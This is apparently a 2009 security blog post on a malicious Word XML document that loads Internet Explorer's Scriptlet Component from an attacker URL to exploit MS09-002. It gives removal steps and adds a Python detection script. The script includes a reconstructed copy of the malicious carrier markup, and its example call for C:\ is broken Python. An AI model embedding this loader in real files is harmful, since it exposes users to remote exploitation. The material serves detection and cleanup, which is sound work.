Be careful of a new virus with an MS Word-like icon
Posted by Hari Saryono on 18 February 2009
A new virus was found (Feb 13, 2009) that carries the MS Word icon and has a file size of 3,871 bytes. The symptoms are:
- Upon opening the .doc file in Word, Word may crash completely.
- Unexpected network traffic when the file is opened.
- Presence of the file "jc.html", with a file size of 9,892 bytes.
This virus is detected as XML_DLOADER.A (Trend Micro).
This detection covers a malicious Microsoft Word (.doc) document with a file size of 3,871 bytes that attempts to exploit CVE-2009-0075, the Internet Explorer vulnerability Microsoft patched in security bulletin MS09-002. The vulnerable code is in Internet Explorer, not in Word: the document only acts as the carrier that loads an IE component and points it at a web page.
Despite its .doc extension, the document is stored in Word's XML file format. Upon opening it, Word may crash, but not always: on some occasions nothing directly malicious is visible and Word opens the file fine. A small red cross may be seen briefly (about a second or two) at the top left of the page.
No macros are embedded in the .doc file.
However, opening it causes a connection to an HTTP address.
A closer examination shows that it contains an object with classid "CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389".
This is the CLSID of the Microsoft Scriptlet Component, which is implemented in mshtml.dll, the Internet Explorer HTML rendering engine.
The object is named DefaultOcxName (the default name Word gives an embedded ActiveX control) and carries a parameter name=URL with the value "http://www.chen####.com/bbs/images/alipay/mm/jc/jc.html". When the document is opened, this component fetches and renders that page, which explains the network traffic from a macro-free document and is how the Internet Explorer vulnerability is reached. Note that the jc.html listed among the symptoms has the same name as the page at this URL.
Removal –
- Install McAfee or Trend Micro antivirus and update its signatures.
- Unplug your LAN / internet connection.
- Use Total Commander (or any file search) to find jc.html and delete it.
- Find every file with a size of 3,871 bytes. Check whether each one is the virus (not every file you find is the virus; only the ones with the Word icon are) and delete those. A more reliable check than the icon is to open the file in a text editor: the malicious document is XML text and contains the CLSID AE24FDAE-03C6-11D1-8B76-0080C744F389 quoted above.
- Start / Run / type "regedit", then find and delete the entries for AE24FDAE-03C6-11D1-8B76-0080C744F389 in the registry (the full CLSID starts with "AE24"). Deleting the class key unregisters the Scriptlet Component for every program; the less destructive option is the ActiveX kill bit for that CLSID (a DWORD value "Compatibility Flags" = 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}), which Internet Explorer and Office honor.
- Restart your computer.
- Check that MS Word works again.
- Reconnect your LAN cable and install the Microsoft patch for this vulnerability (MS09-002). Until the patch is installed, any similar document will trigger the exploit again, because the vulnerable code is in Internet Explorer and cleaning the files does not fix it.
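To make the "which 3,871-byte file is the virus" check from the removal steps and the CLSID/URL analysis above concrete, here is an added triage script. It is not part of the original post and is not Trend Micro's detection logic. It walks a folder, flags files that embed the Scriptlet Component CLSID, extracts the URL parameter, and reports dropped jc.html copies, so that a same-size but benign file is not deleted by mistake. The sample document it builds is constructed for the demo: its element layout is an assumption, since the post only reports the classid and the URL parameter, and it is padded to 3,871 bytes purely to reproduce the reported size.

```python
import html
import os
import re
import shutil
import tempfile
from typing import List, Optional

# Indicators taken from the post: the Scriptlet Component CLSID embedded in the
# document, the document's size, and the name/size of the dropped jc.html.
SCRIPTLET_CLSID = "AE24FDAE-03C6-11D1-8B76-0080C744F389"
DOC_SIZE = 3871
STAGE2_NAME = "jc.html"
STAGE2_SIZE = 9892

# The classid may appear with or without braces and in either case.
CLSID_RE = re.compile(r"clsid:\s*\{?" + re.escape(SCRIPTLET_CLSID) + r"\}?", re.IGNORECASE)
# The URL parameter, either as an HTML <param name="URL" value="..."> tag or as a
# WordML-style attribute pair (w:name="URL" w:val="...").  The post only reports
# "param name=URL, value=...", so accepting both layouts is an assumption.
PARAM_RE = re.compile(
    r'<(?:\w+:)?(?:param|ocxPr)\b[^>]*?\bname=["\']URL["\'][^>]*?\b(?:value|val)=["\']([^"\']+)["\']',
    re.IGNORECASE,
)

# Constructed sample: a WordML skeleton wrapping the object described in the post.
# The element layout is assumed; padding only reproduces the reported 3,871-byte size.
SAMPLE_DOC = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?mso-application progid="Word.Document"?>
<w:wordDocument xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml">
 <w:body><w:p><w:r><w:object>
  <object classid="CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389" id="DefaultOcxName">
   <param name="URL" value="http://www.chen####.com/bbs/images/alipay/mm/jc/jc.html">
  </object>
 </w:object></w:r></w:p></w:body>
</w:wordDocument>
""".ljust(DOC_SIZE, b" ")


def scan_document(data: bytes) -> Optional[dict]:
    """Return indicator details if the data embeds the Scriptlet Component, else None."""
    text = data.decode("utf-8", errors="replace")
    if not CLSID_RE.search(text):
        return None
    return {
        "clsid": SCRIPTLET_CLSID,
        "urls": [html.unescape(u) for u in PARAM_RE.findall(text)],
        "size_matches": len(data) == DOC_SIZE,
        # Word's XML format announces itself with this processing instruction.
        "is_word_xml": "mso-application" in text and "Word.Document" in text,
    }


def scan_tree(root: str) -> List[dict]:
    """Walk root; report documents embedding the CLSID and any dropped jc.html."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                size = os.path.getsize(path)
            except OSError:
                continue
            if name.lower() == STAGE2_NAME:
                findings.append({"path": path, "kind": "stage2",
                                 "size_matches": size == STAGE2_SIZE})
                continue
            # Removal step: every 3,871-byte file is a candidate, but size alone
            # proves nothing; the CLSID in the content is the real indicator.
            if size != DOC_SIZE and not name.lower().endswith((".doc", ".xml")):
                continue
            with open(path, "rb") as fh:
                hit = scan_document(fh.read())
            if hit:
                hit.update(path=path, kind="document")
                findings.append(hit)
    return findings


def demo() -> List[dict]:
    """Scan a throwaway tree holding the constructed malicious document, a benign
    file of the same size (must not be flagged) and a dropped jc.html."""
    root = tempfile.mkdtemp(prefix="xml_dloader_")
    try:
        with open(os.path.join(root, "invoice.doc"), "wb") as fh:
            fh.write(SAMPLE_DOC)
        with open(os.path.join(root, "notes.doc"), "wb") as fh:
            fh.write(b'<?xml version="1.0"?><note>benign</note>'.ljust(DOC_SIZE, b" "))
        cache = os.path.join(root, "Temporary Internet Files")
        os.makedirs(cache)
        with open(os.path.join(cache, STAGE2_NAME), "wb") as fh:
            fh.write(b"<html></html>".ljust(STAGE2_SIZE, b" "))
        return sorted(scan_tree(root), key=lambda f: f["kind"])
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against a real folder with `scan_tree(r"C:\")` on the affected machine; the CLSID match, not the size or the icon, is what justifies deleting a file, and the extracted URL is what to block at the proxy or firewall while the MS09-002 patch is rolled out.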